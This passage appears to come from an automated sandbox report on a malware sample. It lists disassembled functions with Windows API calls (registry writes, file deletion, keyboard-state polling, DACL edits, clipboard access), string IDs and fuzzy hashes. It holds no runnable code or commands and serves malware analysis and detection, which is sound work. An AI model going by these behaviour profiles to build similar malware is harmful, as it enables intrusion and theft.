                                                                                                                      • Opcode Fuzzy Hash: 54ac61d0b9803bc5aca8d6fe52515904bf4ed21b3d779fc3b9f0e1b7e4f384e4
                                                                                                                      • Instruction Fuzzy Hash: 2231F23A5002287ACB149FA5FC4CAEE7BBCAF4A325F004176E806D30D1DB70DA44DB65
                                                                                                                      Function 00540857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00540953
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0054F910,00000000,?,00000000,?,?), ref: 005409C1
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00540A09
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00540A92
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00540DB2
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00540DBF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                      • Opcode ID: ed80254965f9388a4d2b0a2deb42b7ba72d676417d0baabb3ef23873ed6f2c68
                                                                                                                      • Instruction ID: 3254715055e9d8ccf00a2f8c01fcea2d31bade72cdb0c4dbf0ee084574b250ef
                                                                                                                      • Opcode Fuzzy Hash: ed80254965f9388a4d2b0a2deb42b7ba72d676417d0baabb3ef23873ed6f2c68
                                                                                                                      • Instruction Fuzzy Hash: 7902BF35600611AFCB54EF15C844E6ABBE5FF89718F04885DF98A9B3A2CB34EC04CB95
                                                                                                                      Function 004D66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0DV$0EV$0FV$3cM$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGV$_M
                                                                                                                      • API String ID: 0-2295610144
                                                                                                                      • Opcode ID: e0b627e8bfb836dcc6718a3ae53ac6ca94aaa9a24cae1c13ab88d8790bfc05f0
                                                                                                                      • Instruction ID: 0ee479830e8d36acb4d179151ae2e37087a6896e51a58daeb67bd2701e238fd6
                                                                                                                      • Opcode Fuzzy Hash: e0b627e8bfb836dcc6718a3ae53ac6ca94aaa9a24cae1c13ab88d8790bfc05f0
                                                                                                                      • Instruction Fuzzy Hash: A8728F75E006198BDB14CF59C8907EEBBB5FF48710F1581ABE919EB380E7349981CB98
                                                                                                                      Function 0052F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0052F113
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F128
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F13F
                                                                                                                        • Part of subcall function 00524385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005243A0
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0052F16E
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F179
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0052F195
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F1BC
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F1D3
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052F1E5
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00578920), ref: 0052F203
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0052F20D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F21A
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F22C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                      • Opcode ID: 2f44acb69e246bbf218962437d0abc74fa3c27c75f893253d44fba2fb87e87e6
                                                                                                                      • Instruction ID: 80f75da3cc84ad9785f992fe124f59bdd9a1f2ef5ed0d92dc0921b2bfcdacad4
                                                                                                                      • Opcode Fuzzy Hash: 2f44acb69e246bbf218962437d0abc74fa3c27c75f893253d44fba2fb87e87e6
                                                                                                                      • Instruction Fuzzy Hash: D831C23A500229BACB109FA4FC49EEE7BBCAF47365F100175E905A21E0DB30DA45DF64
                                                                                                                      Function 0052A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0052A20F
                                                                                                                      • __swprintf.LIBCMT ref: 0052A231
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0052A26E
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0052A293
                                                                                                                      • _memset.LIBCMT ref: 0052A2B2
                                                                                                                      • _wcsncpy.LIBCMT ref: 0052A2EE
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0052A323
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0052A32E
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0052A337
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0052A341
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                      • Opcode ID: fab20ba724007ea3cb42cf18b0c11f5efc6dec94bc9a38226cdc1980a07fe283
                                                                                                                      • Instruction ID: eea8b40ea0497923255258baf728a29eee69bf6b8c82c8c4bb81950a9d453d3a
                                                                                                                      • Opcode Fuzzy Hash: fab20ba724007ea3cb42cf18b0c11f5efc6dec94bc9a38226cdc1980a07fe283
                                                                                                                      • Instruction Fuzzy Hash: 5B31C0B5904119ABDB20DFA5DC49FEB37BCBF8A705F1040B6F508D21A0E77496448B25
                                                                                                                      Function 00517CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00518202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0051821E
                                                                                                                        • Part of subcall function 00518202: GetLastError.KERNEL32(?,00517CE2,?,?,?), ref: 00518228
                                                                                                                        • Part of subcall function 00518202: GetProcessHeap.KERNEL32(00000008,?,?,00517CE2,?,?,?), ref: 00518237
                                                                                                                        • Part of subcall function 00518202: HeapAlloc.KERNEL32(00000000,?,00517CE2,?,?,?), ref: 0051823E
                                                                                                                        • Part of subcall function 00518202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00518255
                                                                                                                        • Part of subcall function 0051829F: GetProcessHeap.KERNEL32(00000008,00517CF8,00000000,00000000,?,00517CF8,?), ref: 005182AB
                                                                                                                        • Part of subcall function 0051829F: HeapAlloc.KERNEL32(00000000,?,00517CF8,?), ref: 005182B2
                                                                                                                        • Part of subcall function 0051829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00517CF8,?), ref: 005182C3
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00517D13
                                                                                                                      • _memset.LIBCMT ref: 00517D28
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00517D47
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00517D58
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00517D95
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00517DB1
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00517DCE
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00517DDD
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00517DE4
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00517E05
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00517E0C
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00517E3D
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00517E63
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00517E77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 384c3ec7385960b773eb9339f9e7dacb9b136e803102685cfa579cd04d47f737
                                                                                                                      • Instruction ID: 1acbe22f06f03db257eb313d447279f7ff4c3d7b466b58f104bb264471a6c1b9
                                                                                                                      • Opcode Fuzzy Hash: 384c3ec7385960b773eb9339f9e7dacb9b136e803102685cfa579cd04d47f737
                                                                                                                      • Instruction Fuzzy Hash: 44617E75900109AFEF10CFA8DC48EEEBBB9FF48304F148269E815A7291DB319A45DB60
                                                                                                                      Function 0052001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00520097
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00520102
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00520122
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00520139
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00520168
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00520179
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 005201A5
                                                                                                                      • GetKeyState.USER32(00000011), ref: 005201B3
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 005201DC
                                                                                                                      • GetKeyState.USER32(00000012), ref: 005201EA
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00520213
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00520221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 3935c28afaafacd5c37af48132eb896f6b3b6f70cc3c442d8a7f7b7be71d7a35
                                                                                                                      • Instruction ID: 379b299becc9fcb1d9d10980bd6d675b948f6a0416fbb110c9d0e46f59858481
                                                                                                                      • Opcode Fuzzy Hash: 3935c28afaafacd5c37af48132eb896f6b3b6f70cc3c442d8a7f7b7be71d7a35
                                                                                                                      • Instruction Fuzzy Hash: DD511C349067A829FB34DBA0A8587EAFFB4BF13380F48559EC5C1561C3DA649B8CC761
                                                                                                                      Function 005403DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00540E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005404AC
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0054054B
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005405E3
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00540822
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0054082F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: 1f3ceec9e05e2a90b500effad9c474237b2cbf86a7e9efceac82f93524917e42
                                                                                                                      • Instruction ID: 80b8696cc053c7adae8224f05ccbe5a88889e0af3dd9e3166e5eec32b6730a09
                                                                                                                      • Opcode Fuzzy Hash: 1f3ceec9e05e2a90b500effad9c474237b2cbf86a7e9efceac82f93524917e42
                                                                                                                      • Instruction Fuzzy Hash: ACE17F35204200AFCB14DF29C895E6ABBE5FF89318F14896DF94ADB2A1D630EC05CB91
                                                                                                                      Function 00534164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: be04715e5e930fb0b41453439092703de6967584d708ee48b65a623dcedc859d
                                                                                                                      • Instruction ID: 265786f8c332500dff29d4a6090f471e9c9a17e406ef817c36ba3ce6a60d7396
                                                                                                                      • Opcode Fuzzy Hash: be04715e5e930fb0b41453439092703de6967584d708ee48b65a623dcedc859d
                                                                                                                      • Instruction Fuzzy Hash: 1C219139200610AFDB10AF24DC09BAE7BA8FF55719F11802AF9469B261DB74AC44DB54
                                                                                                                      Function 005237EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                        • Part of subcall function 00524A31: GetFileAttributesW.KERNEL32(?,0052370B), ref: 00524A32
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 005238A3
                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0052394B
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0052395E
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0052397B
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0052399D
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 005239B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                      • Opcode ID: 85e4dcef0e2066543b64e4c1f87cff4f17a235c557f0a297e03e7716a6767bf4
                                                                                                                      • Instruction ID: a27c826b16f1fefa14c751da6f9256d73a04c258859d6089a30a557cd3eeed57
                                                                                                                      • Opcode Fuzzy Hash: 85e4dcef0e2066543b64e4c1f87cff4f17a235c557f0a297e03e7716a6767bf4
                                                                                                                      • Instruction Fuzzy Hash: F751B03580515DAACF01EFA1EA92EEDBB79AF56304F60006EE40276191EB386F49CF54
                                                                                                                      Function 0052F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0052F440
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0052F470
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F484
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F49F
                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 0052F53D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F553
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                      • Opcode ID: 8da9a85f95b61fa2f8833239575fdfc9438a2d029ccb78058e1c2f253e82cc94
                                                                                                                      • Instruction ID: 4613bd8a4e8b98a57fd3879f6d27997fe8afc76bd0bdd3b39f549e72ae1d1ce0
                                                                                                                      • Opcode Fuzzy Hash: 8da9a85f95b61fa2f8833239575fdfc9438a2d029ccb78058e1c2f253e82cc94
                                                                                                                      • Instruction Fuzzy Hash: 9F41707590021AAFCF54DF68EC49AEEBBB4FF16314F14447AE815A3191DB309A44CF90
                                                                                                                      Function 004D3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __itow__swprintf
                                                                                                                      • String ID: 3cM$_M
                                                                                                                      • API String ID: 674341424-23921487
                                                                                                                      • Opcode ID: e3824d0973ff5247c861fc504dbd3151c4a69b2a09f9761701d16ba2f62e9a93
                                                                                                                      • Instruction ID: 978678aba87c477da3cbe7b9ace7add13aba3e137feb5cfe27fde6340da1412a
                                                                                                                      • Opcode Fuzzy Hash: e3824d0973ff5247c861fc504dbd3151c4a69b2a09f9761701d16ba2f62e9a93
                                                                                                                      • Instruction Fuzzy Hash: 152277756083019BD724DF14C891BAEBBE4BF84314F00492EF89A97391DB78EA45CB97
                                                                                                                      Function 004D5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 491066e8d46c7d0e2c30ecd0da7f5856d21bdf4f9b9519c73e874803621ff882
                                                                                                                      • Instruction ID: 2676604d4b5837efd60d30abee43031a2bd2bea8eea89baf780ae305ec4eecef
                                                                                                                      • Opcode Fuzzy Hash: 491066e8d46c7d0e2c30ecd0da7f5856d21bdf4f9b9519c73e874803621ff882
                                                                                                                      • Instruction Fuzzy Hash: 5912CC70A00609DBDF04DFA6D991AEEB7B5FF48300F10456EE406E7290EB79AD90CB58
                                                                                                                      Function 00523B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
